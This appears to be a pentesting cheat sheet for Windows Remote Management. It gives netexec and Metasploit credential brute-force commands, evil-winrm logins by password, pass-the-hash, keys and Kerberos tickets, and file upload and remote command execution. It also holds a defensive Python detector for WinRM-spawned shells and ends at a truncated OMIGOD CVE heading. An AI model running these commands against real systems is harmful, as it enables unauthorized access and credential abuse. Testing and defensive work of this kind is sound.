WinRM (Windows Remote Management) Pentesting
Last modified: 2025-03-19
WinRM is the Microsoft implementation of the WS-Management protocol, which provides a common way for systems to access and exchange management information across an IT infrastructure. Default ports are 5985 (HTTP) and 5986 (HTTPS); port 47001 is also used.
Enumeration
Brute Force Credentials
netexec winrm <target-ip> -d DOMAIN -u usernames.txt -p passwords.txt
# Metasploit
msfconsole
msf > use auxiliary/scanner/winrm/winrm_login
Connect
Evil-WinRM is a Windows Remote Management shell for pentesting.
Below is a list of commands for each situation.
Using Username/Password
evil-winrm -i <target-ip> -u username -p password
# -P: Specify port
evil-winrm -i <target-ip> -P 5986 -u username -p password
# Pass The Hash (-H)
evil-winrm -i <target-ip> -P 5986 -u username -H 0e0363213e37b94221497260b0bcb4fc
# PowerShell Local Path (-s)
evil-winrm -i <target-ip> -u username -p password -s /opt/scripts
# SSL enabled (-S)
evil-winrm -i <target-ip> -u username -p password -S
If you have a private key and a public key, you can use them for authentication.
# -S: SSL
# -k: private key
# -c: public key
evil-winrm -i <target-ip> -S -k private.key -c public.key
Using Kerberos Authentication
If we have a Kerberos ticket for a user, we can log in with that ticket, but some settings are required first.
First, modify the nameserver value in /etc/resolv.conf on our attack machine:
nameserver <target-ip>
Then modify /etc/krb5.conf (or create a new one if it does not exist) on our attack machine as below:
[libdefaults]
default_realm = EXAMPLE.LOCAL
dns_lookup_realm = true
dns_lookup_kdc = true
[realms]
EXAMPLE.LOCAL = {
kdc = dc.example.local
admin_server = dc.example.local
default_domain = example.local
}
[domain_realm]
example.local = EXAMPLE.LOCAL
.example.local = EXAMPLE.LOCAL
Note that example.local and dc.example.local must be added to /etc/hosts.
Now set the environment variable and log in with evil-winrm:
export KRB5CCNAME=<username>.ccache
evil-winrm -i dc.example.local -r example.local
Commands
After connecting with evil-winrm, we can use a lot of useful built-in commands.
Note that we need to specify the absolute path for uploading and downloading.
# Upload a local file to Windows machine
PS> upload ./example.bat c:\\Users\Administrator\Desktop\exploit.bat
# Download a file to local
PS> download c:\\Users\Administrator\Desktop\example.txt ./example.txt
# List all services
PS> services
Command Execution with NetExec
# -x: Execute a command (via cmd); -X: Execute a PowerShell command
netexec winrm <target-ip> -d DOMAIN -u username -p password -x 'whoami'
netexec winrm <target-ip> -d DOMAIN -u username -p password -X '$PSVersionTable'
# -H: Login with Pass The Hash
netexec winrm <target-ip> -d DOMAIN -u username -H <HASH> -x 'whoami'
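From the defender's side, every command run through evil-winrm or netexec winrm -x/-X lands on the target as a child of wsmprovhost.exe, the WinRM provider host for remote shells. The following Python is an added example (not part of the original page or of either tool) that scans constructed, Sysmon-style process-creation records for shells spawned under wsmprovhost.exe and counts them per account; the field names and the sample records are assumptions for this example.

```python
import json
from collections import Counter

# Constructed sample process-creation records in a Sysmon-style field layout
# (one JSON object per line). Made up for this example, not real telemetry.
SAMPLE_LOG = r'''
{"host":"ws01","parent_image":"C:\\Windows\\System32\\wsmprovhost.exe","image":"C:\\Windows\\System32\\cmd.exe","command_line":"cmd.exe /c whoami","user":"EXAMPLE\\svc_backup"}
{"host":"ws01","parent_image":"C:\\Windows\\System32\\wsmprovhost.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","command_line":"powershell.exe -NoProfile -Command $PSVersionTable","user":"EXAMPLE\\svc_backup"}
{"host":"ws01","parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\cmd.exe","command_line":"cmd.exe","user":"EXAMPLE\\alice"}
{"host":"dc01","parent_image":"C:\\Windows\\System32\\wsmprovhost.exe","image":"C:\\Windows\\System32\\conhost.exe","command_line":"conhost.exe 0x4","user":"EXAMPLE\\svc_backup"}
'''

# wsmprovhost.exe hosts remote PowerShell sessions for WinRM; a shell or
# interpreter started under it means a command was executed over WinRM.
WINRM_PROVIDER_HOST = "wsmprovhost.exe"
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def _basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_winrm_shells(log_text):
    """Return records where a shell/interpreter was spawned by wsmprovhost.exe."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if (_basename(ev["parent_image"]) == WINRM_PROVIDER_HOST
                and _basename(ev["image"]) in SHELL_CHILDREN):
            hits.append({"host": ev["host"], "user": ev["user"],
                         "command_line": ev["command_line"]})
    return hits


def summarize_by_account(hits):
    """Count WinRM-spawned shells per (host, user) to spot the account in use."""
    return Counter((h["host"], h["user"]) for h in hits)


if __name__ == "__main__":
    found = find_winrm_shells(SAMPLE_LOG)
    for h in found:
        print(f'{h["host"]} {h["user"]}: {h["command_line"]}')
    print(summarize_by_account(found))
```

Legitimate PowerShell remoting produces the same parent/child pair, so baseline which accounts and hosts normally use WinRM before alerting on every hit.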
OMIGOD (CVE-2021-38647)
Open Management Infrastructure (OMI) is vulnerable to Remote Code Execution (RCE).
There are many PoCs available, for instance: